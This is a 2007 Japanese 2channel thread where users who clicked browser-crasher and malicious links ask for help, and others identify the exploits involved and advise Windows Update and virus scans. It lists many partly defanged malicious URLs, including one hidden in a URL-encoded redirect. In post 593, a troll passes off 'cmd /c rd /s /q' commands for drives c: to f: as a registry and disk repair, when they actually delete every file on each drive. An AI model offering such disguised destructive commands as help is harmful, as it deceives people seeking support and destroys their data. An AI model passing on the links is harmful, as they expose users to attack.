>>399 女子高生コンクリート詰め殺人事件概要ページ
見たきゃ見れ
402 :
名無しさん@お腹いっぱい。 :2007/03/16(金) 17:17:26
403 :
名無しさん@お腹いっぱい。 :2007/03/16(金) 18:01:34
://monoganac2.sakura.ne.jp/src/milktea14191.jpg を踏んでしまいました。 何かダウンロードしようとしたので全てキャンセルをクリックしました。 そのあと怖くなって電源を切って休止モードにしました。 再起動してみたらノートンが大量にウイルスを検出しました。 詳しくないのでよく分からなかったのですが、どのウイルスも 「ファイルを修復できません」「ファイルへのアクセスが拒否されました」とうつりました。 とりあえず一時ファイルを削除して今スキャンしています。 【使用OS】XP 【WindowsUpdateしてるか】 最近はしていないと思います 【AntiVirusは何を使っているか】 最初から入ってるノートン 【ちゃんとUpdateしてるか】 していません 【スキャンした結果(ウイルス名・発見場所)】上記URL 【別のオンラインスキャンしたならその結果は】 していません 【症状を具体的に、分かる限りすべて書く】 今のところなんともありません 【何をしたらそんなことになったのか】 上記URLを踏んだら 【これまでにとった措置】 一時ファイルの削除 ノートンでコンピュータをスキャン 【その他の質問】 ノートンいがいにソフトやスキャンは必要ですか?
404 :
403 :2007/03/16(金) 18:08:01
【スキャンした結果(ウイルス名・発見場所)】今スキャン中 慌てて書き込んだので間違えてました。 訂正。
405 :
403 :2007/03/16(金) 18:20:48
スキャンしました。感染はありませんでした。 大丈夫でしょうか?
ビビり杉w
> 【AntiVirusは何を使っているか】 最初から入ってるノートン > 【ちゃんとUpdateしてるか】 していません カスペあたりでスキャンしといたほうがいいと思うけど
409 :
403 :2007/03/16(金) 21:16:48
>>407 サイトには繋がってると思います。
笑い声が聞こえてきて赤い画面でした。
すぐに電源を切ったし英語だったので何が書いてあるのかはわかりませんでした。
ワンクリの可能性もありますか?
>>408 カスペのオンラインスキャナを試してみようと思います。
410 :
名無しさん@お腹いっぱい。 :2007/03/16(金) 21:45:26
412 :
名無しさん@お腹いっぱい。 :2007/03/16(金) 23:17:40
411 スパイウェアもウイルスもですか? ウイルス対策ソフトを入れててスキャンしても反応はなかったのですが問題ないでしょうか?
>>412 ウィルス対策ソフト名とバージョンおよびパターンファイルのバージョンさらして味噌
ソースネクストです。
>>414 それはソフト売っている会社の名前だろう。
> ウィルス対策ソフト名とバージョンおよびパターンファイルのバージョンさらして味噌
ちゃんと答えましょう。
わからないならわからないと答えましょう。
416 :
399 :2007/03/16(金) 23:35:51
ソースネクストのZEROというソフトだと思います。あやふやですみません。アップデートはいつもしています。
>>410 Loveletterの亜種ですね。AviraではVBS/Loveletter.Dでした
まだカスペやNODでも対応してないみたいですね
>>419 VBS/Loveletter.B 確認
422 :
名無しさん@お腹いっぱい。 :2007/03/17(土) 13:04:53
まさかIE使ってるやついないよね?
>>422 ソース見る限りではウィルスはないだろ。
conconとか旧型のブラクラがはってあった。
俺は、いつもIEで突っ込んでいる。 感染したことは無いが (-。-)y-゜゜゜
脳みそ感染してるから気がつかないだけだよ (-。-)y-゜゜゜
427 :
名無しさん@お腹いっぱい。 :2007/03/17(土) 17:07:22
>>424 そうなんですかー。
自分は行ってないのでわからないのですが、
ウイルスは違う所で感染したんですかね。
とりあえずありがとうございました。
>>428 内容自体は
>>419 や
>>410 、
>>384 辺りと同じ
>>3 以外にも脆弱性を突くサイトを複数呼び出すので
Windowsの更新を怠っていて、それらのサイトに運悪く繋がると感染の恐れはある
逆に言えばUpdateをきっちりやっているならそう心配する必要も無い
一時ファイル削除して適当なスキャンして何も出なければ完了
リカバリが面倒というのでなければそれでもいいけど
>>429 ありがとうございます、WindowsUpdateは最新でブラウザはFirefoxを使っていたので、とりあえず安心です
カスペオンラインの重要箇所のスキャンとDrWEBのスキャンで何もでなかったのでおそらく大丈夫だと思います、一時ファイルの削除にはCCクリーナーを使ってみます。
どうもありがとうございました。
431 :
名無しさん@お腹いっぱい。 :2007/03/17(土) 22:31:12
//www.playsese.com/bbs/ 踏んでしまった。。 定義ファイル最新のAVGが トロイのダウンローダーを検出したので保管庫に移動。 ブラウザはSleipnirでIEの一時ファイルとCookie削除。 これで大丈夫ですかね?
>>431 ネトゲの垢ハック狙いのサイトかな
WindowsUpdate済ならスクリプトが不発に終わるので感染は無いはず
VirusTotalでの確認だけど3種のダウンローダーと実行対象のトロイいずれも
AVGで検出可能なようなので、それで問題無いかと
>>432 WindowsUpdateは皆無。。
だけどネトゲやってないしPCを破壊するものではないんだよね?
ブログに書き込まれたものだったんだけど油断してて開いちまった…
書き込まれたホストとplaysese.comはいずれも中国のサイトだった。
まぁ中国だからそんなことだろうとは思ったんだが。
バーチャルPCで実験しても特に異常は無かったみたいです。
ご回答ありがとうございました。
>>433 とっとと
1. AVGでフルスキャン
2. Windows Update or Microsoft Updateを実行
最低限この順番で実行する!
yourfilehost全体に言える事だけど、ページ内にある広告経由で ランダムでうさんくさいサイトが開く事はある 一時期はウイルスサイトが出る場合もあった 自分が開いたタイミングでは確認できなかったけど 多分DriveCleaner辺りのインチキソフトでも勧められたのかな まぁインストールしてないなら大丈夫だと思われ
437 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 14:46:46
こいつを踏んでしまいました↓ tp://www.nyaa-nyaa.com/das01.html どのような対処がよいでしょうか
438 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 15:31:30
440 :
439 :2007/03/18(日) 16:43:36
hを抜かずに直リンしてしまいました。 すみませんでした。
>>439 >>428 と大体同じなので、ウイルスチェックして何も出なければそれで完了
強いて言うなら
>>3 の呼び出しによってOEに変なニュースグループが出来ている事もあるが
それも何回か起動・終了しているうちに消える
まぁ特に問題無いんじゃないかと
事前にきっちりWindowsUpdateさえやっておけば嫌がらせの域を出ない程度の代物
そう心配する必要も無い
>>441 早速のレスありがとうございます。
WindowsUpdateも最新のものでしたし、それほど心配する必要がなさそうで安心しました。
今後は安易にURLに踏まない様に気をつけます。
で、
>>439 の出所が恐らくここなんだけど
http://news21.2ch.net/test/read.cgi/mnewsplus/1174161023/221 221 名前: 名無しさん@恐縮です 投稿日: 2007/03/18(日) 05:43:25 ID:iHgW4VnH0
365 名前: :2007/03/18(日) 05:18:09 ID:nsBpgsd60
日本 3−2 メキシコ
試合のハイライト動画
ttp://chiffon.ty.la nd.to/src/Chiffontea0967.avi
いかにもレスの転載に見せかけてはいるのだけど
ロダに当該ファイルが上がったのが 07/03/18(Sun),05:40:05 だから
「365」が上げ主では無い。時間帯からして恐らく「221」本人によるもの
こうやって「自分で」悪意のあるファイルをアップローダーなり
ホスティングサイトなりで下準備した後、適当なスレに投下するのが最近横行している手口
アク禁に追い込めないものかね。こうした下準備をしても、
2ちゃんにさえ書き込みが出来なければそれが日の目を見ることは無いのだから
444 :
439 :2007/03/18(日) 17:40:44
>>443 自分が踏んだのは別のスレにコピペされたもので、
IDチェックをしたら、複数のスレに同じものが貼ってありました。
以後、同じブラクラに引っ掛からない様、「Chiffontea」をNG登録しました。
445 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 18:02:13
410は問題ないですか?
447 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 19:26:10
元々入れていたセキュリティーソフトが接続を防いでいました。その後そのソフトでスキャンしてウイルスを削除しました。またその後ノートンのオンラインスキャンではウイルスはありませんでした。これで問題ないですか?
448 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 19:28:09
すいません、445です。お願いします。
>>439 を踏んでしまったところ
TROJ_NASCENE.YとVBS_SMALL.ENPに感染してしまったみたいなんです
OSはXP2HomeEdition
WindowsUpdateは最新なんですが
Macafeeのアンチウイルスは更新してません・・・
症状は出てないと思うのですが
措置としてはインターネット一時ファイルは削除システムの復元を無効にしました
今後の対応をどうすればいいんでしょうか
>>447-448 >>410 以降で一通り回答されている通りなのだけど
>>439 とか
>>428 とか
>>384 などと大体同じ
踏んで感染まで行くかどうかはWindowsUpdate次第
最新の状態ならあまり心配する必要無い
手持ちのセキュリティソフトが信用できないなら
各社のオンラインスキャンなどを試す
http://pc11.2ch.net/test/read.cgi/sec/1171809750/9 そこまでやって何も出なかったのなら大丈夫だと思うけどね
>>449 踏んで感染まで行くかどうかはWindowsUpdate次第
最新の状態ならあまり心配する必要無い
>TROJ_NASCENE.YとVBS_SMALL.ENPに感染してしまったみたいなんです
Mcafee使っているの?検出名がウイルスバスターみたいだけど
>今後の対応をどうすればいいんでしょうか
手持ちのアンチウイルス定義を最新に更新、再度スキャン。何も出なければ完了
451 :
449 :2007/03/18(日) 22:27:07
>>450 マカフィーでも一応はスキャンしたのですが感染していないと出たので、トレンドマイクロでのオンラインスキャンの結果そう出たんです
それからインターネット一時ファイル削除後にカスペオンラインスキャンをしたところウイルスは検出されなかったので
一先ず安心という事なんでしょうか?
>>451 トレンドマイクロでのオンラインスキャン時にウイルス検出した場所が
〜〜\Temporary Internet Files\〜〜なんとかって場所だったのなら問題無い
「インターネット一時ファイルの削除」はそこにあるファイルを消す作業
まぁその後のカスペでスキャンで何も出なかったのなら、ひとまず安心かと
453 :
名無しさん@お腹いっぱい。 :2007/03/18(日) 23:34:47
>>450 元々入れていたVSゼロでスキャンして検出したウイルスを削除しました。その後ノートンのオンラインスキャンをしましたがウイルスは検出されませんでした。これで安心なのでしょうか?
>>418 が気になります。
454 :
449 :2007/03/18(日) 23:40:14
>>452 そうですか
安心しました
これで心置きなく眠れそうです
みなさんありがとうございます
>>455 わかりました。 ありがとうございます。
すいませんが鑑定スレはどこにあるのでしょう? この板には無いようですが・・・・
>>460 既に出てた^^;
NG登録してたから見えなかった
こんなことだからブラクラ踏むんだな
>>462 これ踏んだ人多いみたいだね、色んなとこ見るわ
また芸スポか
>>465 WindowsUpdate済では無かったので不安でしたが、
一時ファイル削除後のスキャンでは何も出ませんでした。
ありがとうございました。
469 :
名無しさん@お腹いっぱい。 :2007/03/21(水) 02:03:30
危険だよ
-- 「2007/03/11 7:34」のキャッシュをチェックしています。 -- ※このアドレスは危険URLのひとつです。 注意!アラートオープンを発見! (1) 注意!逃げウィンドウを発見! (1) 注意!ゾンビ ウィンドウを発見! (1) 注意!フルスクリーンを発見! (1) ブラクラチェックが終了しました。 ※ windowオープンを発見しました。(4)
477 :
名無しさん@お腹いっぱい。 :2007/03/23(金) 21:01:34
お断りします
>>477 そろそろこのキャプの登場だな@芸能女板
Natsukawa Jun CM
普通に夏川純だが、ここ鑑定スレじゃないよな
釣られたか
480 :
477 :2007/03/23(金) 22:39:28
>>479 ありがとうございます。
すみません、夏川純関係だとは思いましたが、危ないかな・・・と思って一応お願いしたのですが、
スレ違いだったのでしょうか?ごめんなさい。
(以前、こういう芸能関係を装ったのを踏んで失敗したことがあったような気がしたので・・・)
鑑定スレとはどういうスレ(目的)なのでしょうか。いまいち違いがよく分かっていませんm(__)m
以後気をつけます。
>>480 まぁ、
>>1 見て下さいって事で
一応ここは名目上、「既に踏んでしまった人」に助言するスレだから
踏むのが怖いから代わりに見て下さい、というのは
>>458 とかのスレで頼んでおくれ
482 :
477 :2007/03/24(土) 10:15:44
>>481 了解です。すみませんでしたm(__)m
(+x+)←これが可愛い件について
484 :
名無しさん@お腹いっぱい。 :2007/03/29(木) 16:19:55
(+x+)<ageるぞ
ニュー速+のTBS捏造スレで貼ってるやついるな
>>485 不二家不祥事捏造事件(←今回の事件)
tbs-mondai.4mg.com/0703_about_fujiya.html(現在404)
釣る気満々w
>>462 と同じヤシだろ、URL偽装してまで踏ませたいなんてよっぽど暇なんだろうなぁ
487 :
名無しさん@お腹いっぱい。 :2007/03/31(土) 22:12:08
488 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 02:02:25
外人のねーちゃんじゃん
490 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 02:46:08
491 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 02:53:04
その画像ブラクラチェックしたらVBのウイルス隔離警告でた
>>490 いや、有害だけど
In file AP4.jpg found virus Exploit.CrashSOS
珍しいな、 ソースチェッカーで調べてる時にウイルス反応したの初めてだよ
>>488 MS04-028のPoCかな
昔jpegファイル(の処理)に存在した脆弱性を実証するためのファイル
穴のある環境が用意できないので具体的な症状は見れないけど
恐らくOSかブラウザが落ちる。感染活動はしないと思うけど
性質上セキュリティソフトはマルウェアとみなして検出する
脆弱性自体は2年くらい前に発見されたものなので
OSや各種アプリが特段古い状態のままだというのでなければ踏んでも特に問題無いはず
495 :
488 :2007/04/01(日) 05:03:22
いまだに何もないということは大丈夫なのでしょうか.
OSはXPです。
>>491-494 有難う御座いました。
496 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 05:09:49
498 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 08:53:50
501 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 19:54:48
502 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 19:57:43
503 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:00:03
安全に見せかけてウインドをクルクル・・・プププ
504 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:10:14
ウインドウが前にプププ後ろにプププ
506 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:20:52
消防だな・・・ この前のアドバイスが分ってなかったようだな それでは効果が薄いんだよ
507 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:23:09
>>501 見っ直そう〜 見直そう
(⌒) .(⌒) (⌒) .(⌒) (⌒) .(⌒)
( ´・●・)つ ( ´・●・)つ ( ´・●・)つ
( 二つ ( 二つ ( 二つ
\./ /、 \./ /、 \./ /、
∪`J ∪`J ∪`J
508 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:26:30
509 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 20:29:16
\\ シャバダバダバダバダバダバー // \\ シャバダバダバダバダバダバー // (⌒) .(⌒) (⌒) .(⌒) (⌒) .(⌒) ( ´・д・.】) ( ´・д・.】) ( ´・∀・.】)<あ、もしもし!ソースのO円下さい! ( ノ ( ノ ( ノ
510 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 21:56:33
>>510 てか、ZEROを入れて使いこなせよw
話はそれからだwww
512 :
名無しさん@お腹いっぱい。 :2007/04/01(日) 23:27:33
携帯で踏んだらどうなりますか??
まずは踏んでみてから聞け
516 :
名無しさん@お腹いっぱい。 :2007/04/10(火) 01:41:28
519 :
名無しさん@お腹いっぱい。 :2007/04/10(火) 09:34:29
>>3 IPを抜かれる とありますが、
IP抜かれると PC内の情報(カード情報とかパスワードとか)を
覗かれてしまうことはあるんでしょうか?
心配で・・・
無いから気にするな
521 :
名無しさん@お腹いっぱい。 :2007/04/10(火) 10:36:27
>>515 俺も昨日踏んだ、ニュー速のキンタマ流出スレで
avastにも反応なかったけど
さっきPC起動したら、凄く重い・・・
やっぱヤバイのかな?
523 :
名無しさん@お腹いっぱい。 :2007/04/11(水) 01:21:39
525 :
名無しさん@お腹いっぱい。 :2007/04/21(土) 09:41:30
Sorry! You IP is blocked.
厨房ホイホイ踏んでしまって鬱… 国際電話料金が発生するとかしないとか。 心配しすぎて死にそうなので誰か何かお願い
529じゃないがたぶんこれ p://www.hellplant.org/cgi-bin/xoor/serpent.cgi
>>529 ですが、最後がcgiで終わってたので多分それです。
一応NTTが配布してる国際電話に接続されたら知らせてくれるソフトインストールしてみて異常はないのですが心配です…
これは陰謀だよ
特に問題ないですかね?
問題ないよ
ありがとうございます。
537 :
名無しさん@お腹いっぱい。 :2007/05/13(日) 22:00:07
定期age
538 :
名無しさん@お腹いっぱい。 :2007/05/20(日) 20:06:06
プニル使用で下記サイト踏んだらポップアップが閉じては出ての繰り返し タスクマネージャからブラウザごと落とせるものの設定を前回終了時の状態で 開くようにしてるので延々繰り返しです tp://anti.bne.jp/upload/updata/
プニルって設定ファイルがあるだろ それを直接いじれ どこを弄るのかは知らん
540 :
名無しさん@お腹いっぱい。 :2007/05/23(水) 21:12:03 BE:217656634-PLT(12106)
>>538 起動時にCtrl押しながら起動する
これで確か起動時のタブ復活がなくなる気がした
541 :
名無しさん@お腹いっぱい。 :2007/05/24(木) 23:06:48
ひたすら重たい以外は特に害は無いんじゃないかな
よく見たら
>>320 に書いてあるね
興味、好奇心(だけ)の問題ですんません goggle踏んでパソが壊れるつーyoutube動画に出てくる da vinci ってなんなんでしょうか知ってる方おられます? 方々のセキュサイトみたりググったりしたんですけど判りませんで
544 :
名無しさん@お腹いっぱい。 :2007/05/25(金) 16:14:50
ttp://www.mediafire.com/?5woym92b4ry これを踏んだら貴方のカード情報や個人情報が漏れるので
セキュリティのなんとかをインストールしますか?みたいなのが
2度出てきたんですが、2度ともキャンセルしてFirefoxを終了して
すぐに入っているマカフィーと、オンラインでカスペでスキャン、
ウイルスは検出されませんでした。
Spybotで「ErrorSafe」「Winsoftware」が出てきて、18項目を削除。
AD-Awareではとくに異常なしでした。
ググったらインチキソフトをDLさせるものみたいですが、キャンセルしてたら
大丈夫ですよね?
546 :
545 :2007/05/25(金) 20:14:13
(´-`).。oO(別に俺のPCじゃないしどーでもいいや)
___ / ヽ , -‐ (_).⌒ l ̄| ⌒ | プギャーーー l_j_j_j と) ノ─| ノ / / ヽ 〈 ノ |
548 :
名無しさん@お腹いっぱい。 :2007/05/28(月) 14:59:02
ワンクリか
>>548 最近は動画ファイルナビゲータとか大手のエロサイトにもワンクリック詐欺の
サイトが更新情報の欄に載ってたりするから性質が悪い
そういうサイトって質の悪いつまらないファイルしか置いていないから余計に腹が立つ
↑ でたww妄想中ww ついにここまで侵食してきたか・・・。
553 :
名無しさん@お腹いっぱい。 :2007/05/29(火) 20:40:12
tp://www.ahatena.com 【使用OS】XPsp2 【WindowsUpdateしてるか】してる 【AntiVirusは何を使っているか】 使ってない 【ちゃんとUpdateしてるか】 【スキャンした結果(ウイルス名・発見場所)】 シマンテックのオンラインスキャン現在実行中 【別のオンラインスキャンしたならその結果は】 【症状を具体的に、分かる限りすべて書く】 まだ未発症 【何をしたらそんなことになったのか】 【これまでにとった措置】 システムの復元 【その他の質問】 JAVAスクリプトでなんか書いてあるみたいなんだけどなんのことやら。
>>553 ネトゲのアカウントハックを狙ったサイトかな
ブラクラとかかわいい物では無くWindowsの脆弱性を突くなど
純粋に悪意をもって作成された類のサイト
踏んだ時点でWindowsUpdateがきっちり行われていれば
(最低でもMS06-014とMS07-017の脆弱性を塞いでいる事)
感染まではいってないと思う
一応スキャンして何も出なければ完了かな
555 :
名無しさん@お腹いっぱい。 :2007/05/30(水) 00:01:14
>>554 おぅ、ありがと〜。
優先度の高い云々はなかったんで大丈夫なのかな。
スキャンしてみたら7つ感染って言われてうち6つはLIve2chの.dat
1つがlocalのIEキャッシュに.curってのがあったんで消してきた。
メモリになけりゃ問題なしなのかな。
あとは一応ネトゲのパス変えてきます、ありがとう。
ここに出てあるサイト全部踏んでみたけど(もちろん仮想OSで) ほとんどぜんぶがポップアップブロックで防いでくれるんだよな。 もっと強烈なのキボンヌ
仮想じゃなくて、メインで踏めよ。
有給休暇をいただいたので、 内緒で姉のパソコンでインターネットして いろんなアーティストのサイト見まくっていたのですが、なんと なにかのひょうしに見ていたサイト画像がパソコンの後ろに 表示されたままになって元に戻せません! 前は山下智久の画像だったのに、今は満面の笑みで写った山下達郎の画像です・・・。。 再起動しても表示されたままなんです。 早く直さないと姉が帰ってきてしまいます!(看護師なので・・・・) 至急助けてください!!! ここのスレッドの人ならわかるとおもいました。 OSはWindows2000です。 よろしくお願いします。
6 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/06/04(月) 10:13:51 有給休暇をいただいたので、 内緒で姉のパソコンでインターネットして いろんなアーティストのサイト見まくっていたのですが、なんと なにかのひょうしに見ていたサイト画像がパソコンの後ろに 表示されたままになって元に戻せません! 前は山下智久の画像だったのに、今は満面の笑みで写った山下達郎の画像です・・・。。 再起動しても表示されたままなんです。 早く直さないと姉が帰ってきてしまいます!(看護師なので・・・・) 至急助けてください!!! ここのスレッドの人ならわかるとおもいました。 OSはWindows98seです。 よろしくお願いします。
後は、XPとVistaか……
おそらく
>>4 かと思うのですが、踏んでしまいました
tp://up.uppple.com/src/up3411.jpg
PCが青画面になって動かなくなったので、スイッチを長押しして強制終了させました
マカフィーは無反応
無害でしょうか?
開いたブラウザはスレイプニールです
>>562 レス有り難う御座います
OSはXP、自動更新はONにしていますが、念のためにフルスキャンしてみようと思います
>>559 話は看護師のねーちゃんの画像をうpしてからだ
今日あるサイトで四字熟語のゲームをしてましたところ 急に画面に 3333・・・・・と どんどん3が出てきてしまい Wordを使おうとしても 何をしても3が連発されてしまいます その上 3はキーボードで打てません ひらがなで さん と打ってから変換してますが これってブラクラでしょうか? 初心者なので よろしくお願いします
キーボードの「3」のキーが潰れてるとか いや、違うか
569 :
566 :2007/06/12(火) 00:23:19
ありがとうございます とりあえず567さんの言うとおりに オンラインスキャンというやつをしています 結果またご報告いたします ただウィルスに関しては2回ほど検出しようと したのですがウィルス無しと判定されます それと568さんの言うとおりに キーボードの 「3」が潰れてるのかとも 思いますが調べる方法もわかりません それとPCは 3が連打されるようになってから 何て言うんでしょうか、PCを購入時と同じ設定に 戻していますが 3 が連打されるのです 自分でも頑張ってるのですがわかりませんでした ご親切なアドバイス ありがとうございました!
キーボードを別のと取り替えるか外して起動してみて、 同じ症状が出るか否かで原因を考えてみる、とか
573 :
571 :2007/06/13(水) 14:01:37
>>572 教えていただきどうもありがとうございました
575 :
名無しさん@お腹いっぱい。 :2007/06/13(水) 17:47:27
>>574 超ヤバスwケータイブリブリってなるw
576 :
566 :2007/06/13(水) 23:19:16
570さん ありがとうございました PCがノート型なのでキーボード取替え出来ません 567さんの言う通りスキャンしてみましたが ウィルスは見つかりませんでした 色々ご相談乗っていただきありがとうございました 新しいPCが買えるようになるのがいつになるか わかりませんが 現れる 3 と戦いながら 何とか使ってみます
USB接続の外付けキーボードをノートにのせて使ってみれば(かっこ悪いけどw) 修理すると万単位だけどこの方法なら千円でできる。
正直、サポートに電話したほうが早いぞ
動画でよくある精神的ブラクラ…今日久しぶりにひっかかった。 雨で暇だったからようつべで遊んでたら韓国ダンサーの失神のあと「ぎゃーーー」 以前は間違い探しサイトでジーとみてたら画面いっぱいに山んばのようなばばあが「どばーーー」 いやになってくるよ・・・くそが
>>580 かおる姫だね。再インスコ→以後全て怪しむ。
>>583 再インスコというのは具体的にどうすればいいのですか?ググってもわかりませんでした
超初心者ですみません(´;ω;`)教えて下さい
>>584 再インストールもしくは再セットアップ。
俺も初心者のとき泣いたもんさ。バックアップ取ってないなら失ったファイルは諦めろ。
>>585 レスありがとうございます
ファイル復元できないのか_| ̄|○
仕事のファイルとか消えてマジ自殺レベルです
解凍しただけでどうして実行されるのか解説キボン
解凍して「実行した」が抜けてるだけだと思うけどね 入っていたのがかおる姫なら多分アイコン偽装のexeだろう
590 :
名無しさん@お腹いっぱい。 :2007/06/21(木) 19:27:42
>>586 OSの再インストールが済んだらいれます。dクス
>>589 すみませんその通りです
「実行した」というのが抜けてました。
いろいろググってみると自分がいかに無知だったか思い知ったよ…
こういうの初めてで勉強になりました。
何とかしてファイル復元できんかな?という希望も捨てることにします。
レスして下さった方々どうもありがとう
591 :
名無しさん@お腹いっぱい。 :2007/06/21(木) 23:09:54
アドわかんなくなったけど ガレッジセールが出てきて激しくパソコンが、ガガッガガガガ ってなったけど 詳細きぼん こわくてすぐ消した
これは… 詳細キボン
>>590 チェックディスクコマンドを試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
ん?w悔しかったの?
?
(・・?)
601 :
名無しさん@お腹いっぱい。 :2007/06/23(土) 23:23:33
tp://www.subculture.com/backdoor.html これを踏んでしまいました。 何か問題ありますでしょうか・・? よろしくお願いします。
>>601 ジョークページの一種だけど、ページ内の文字列(LOVE-LETTERうんぬん)に
一部のセキュリティソフトが反応するかもしれない
踏んでウイルス感染とかは無いので、特に対処の必要も無い
>>602 URL短縮サービスを使って、各種ブラクラ+悪意のあるサイトを呼び出すURLに飛ばされる
>>561 あたりのものと大体同じ内容
604 :
名無しさん@お腹いっぱい。 :2007/06/24(日) 17:25:05
>>603 ありがとうございます。
一安心です。。
605 :
名無しさん@お腹いっぱい。 :2007/06/25(月) 15:54:32
タブブラウザ使ってたのにIEの窓がいっぱい出てくるブラクラに踏んでしまいました。 タブブラウザの関連付け、「プログラムの追加と削除]の設定、「インターネットオプション」の[プログラム]にある [IEの起動時に、通常使用するブラウザを確認する]にもチェックを入れていました。 IEの窓がでるブラクラを防ぐには後、どの設定が必要なんでしょうか?
606 :
名無しさん@お腹いっぱい。 :2007/06/25(月) 19:37:50
>>606 ※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (6)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (100)
危険!FDDアタックを発見!(24)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (6)
危険!Telnetストームを発見! (184
608 :
名無しさん@お腹いっぱい。 :2007/06/26(火) 03:37:38
>606 ふんじゃったんですが、ウィンドウが沢山開きだして、とりあえず強制終了したのですが 大丈夫でしょうか??
www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=http%3A%2F%2F%77%77%77%2E%68%65%6C%6C%70%6C%61%6E%74%2E%6F%72%67%2Fcgi-bin%2F%78%6F%6F%72%2F%73%65%72%70%65%6E%74%2E%63%67%69&btnI=I%27mFeelingLucky&num=50 これを踏んでしまったのですが大丈夫でしょうか? 【使用OS】Windows XP sp2 【WindowsUpdateしてるか】しています 【AntiVirusは何を使っているか】NAV、AVG 【ちゃんとUpdateしてるか】しています 【スキャンした結果(ウイルス名・発見場所)】感染なし 【別のオンラインスキャンしたならその結果は】カスペルスキーで感染なし 【症状を具体的に、分かる限りすべて書く】 WMPが起動、telnetがアクセス開始、コマンドプロンプトが3つほど起動、メーラーが起動 WMPはすぐに閉じたのでなにがあったのかわかりません。コマンドプロンプトも 焦っていた為、内容確認せずに閉じてしまいました。メーラーはサンダーバードでしたが ニュースグルーブの登録ダイアログが出てきたので拒否、telnetのアクセスはFWが反応したので拒否しました 【何をしたらそんなことになったのか】 上記URLをクリックしました 【これまでにとった措置】 スパイウェアの検索、ウィルスの検索 【その他の質問】 このまま使用していても大丈夫でしょうか?個人情報やwebサイトのパスワードなどが漏れてないか心配です
>>609 単なる厨房ホイホイ
IP抜き、telnetが少し開いたりするだけ
無害
612 :
609 :2007/06/26(火) 05:41:53
>>610 >>611 ありがとうございます、おかげで安心できました。
初めての経験だったので不安でした。以後気をつけたいと思います。
ぐわーやーらーれーたー
615 :
608 :2007/06/26(火) 17:52:14
>611 ウィルスチェックしたら、感染していました… ありがとうございました
厨房ホイホイはウイルスあったっけ
>>617 ジョークフラッシュだからPCに後遺症はないよ。
>>618 ありがとうございます。
ということはあまり被害はないということでいいんでしょうか?
>>620 昔はブラクラURLだったが今は撤去されている
危険って言っている奴がいるのはそのためかと
あまりというか無害という事でいい
www.geocities.jp/itimankakkei これを踏んでしまった。 ゲーム攻略サイトかと思ったのに 何かPCに害あるんだろうか…
>>625 害は無いのか良かった。
ありがとうございました。
tp://bebe.run.buttobi.net/up/src/be_0794.jpg 専ブラで踏んでしまいました。 画像のキャッシュは削除したのですが実害はあるのでしょうか?
>>627 専ブラといってもjaneかギコか何かわからんが…
janeあたりだと、こういうのはデコードエラーになって
ブラクラの発動は無いとか聞いたが使ってないからわからない
画像プレビューとかもそうだが、踏んでしまってもあくまで「画像」として処理したのであれば実害は無いはず
対象を拡張子の通りhtmlとして開いてしまったら(ブラウザが立ちあがったら)有害
その時は大体FDDがブーブー言ったり何か色々出てきたりするので
見た目で明らかに変なの踏んだと分かるかと思う
中身としては
>>561-562 あたりと同じ
まぁ変なの踏んじゃったと思うなら、こういう機会にウイルスチェックしておく事をお勧めする
629 :
名無しさん@お腹いっぱい。 :2007/06/28(木) 16:11:20
あるブラクラを踏んでしまったかも ブラクラを踏んで結果的に個人情報が流出することはあるのでしょうか? 見知らぬ土地から電話がきますた 無視しましたが
どの程度の個人情報か知らんけど、ブラクラ踏んで個人情報は漏れないでしょ ウイルス踏んだなら別だけど
631 :
名無しさん@お腹いっぱい。 :2007/06/28(木) 23:23:20
632 :
名無しさん@お腹いっぱい。 :2007/06/28(木) 23:24:19
EXP/HTML.WindowBo.G by Avira AntiVir Opera、Mozilla Firefoxじゃ開けない 例によって標準設定のInternet Explorerだと危険だ
>>632 のやつ踏んでしまいました
もう少し詳しく教えていただけませんか?
症状としては、変な画像が出たと思ったらメーラーが勝手に開いて
新しいウィンドウが開く無限地獄になりました
強制終了の後、再起動後は何事もなかったように動いています
恐いので今日はモデム切って寝ます
636 :
名無しさん@お腹いっぱい。 :2007/06/30(土) 00:13:30
踏んじまったorz
まぁ、URLが98個有ったんで、全部踏んでみた。 警告はたくさん出たが、ほとんど、JScriptとWindows Updateでパッチが公開されている脆弱性を狙った奴ばかりで、 感染はしなかった。
乙
>>632 Proxomitronが防いでくれた
もっと簡単に使えるならみんなにも薦めるんだが
フィルタを追加してると自分でも分からなくなるんだよな
640 :
名無しさん@お腹いっぱい。 :2007/07/04(水) 20:11:30
htmlをjpgに拡張子変更してるだけのブラクラだったら firefoxやopera使うだけで防げるやん
IEでも拡張子でファイルを開くようにすれば良いだけ IE信者の人や、初心者にお勧め ただし、IEの標準設定での表示、動作を前提に作ってあるサイト(糞サイトw)もあるから、 若干の不都合が出ることも覚悟の上で
642 :
MyDoom被害経験者(当時は深刻) :2007/07/05(木) 03:13:45
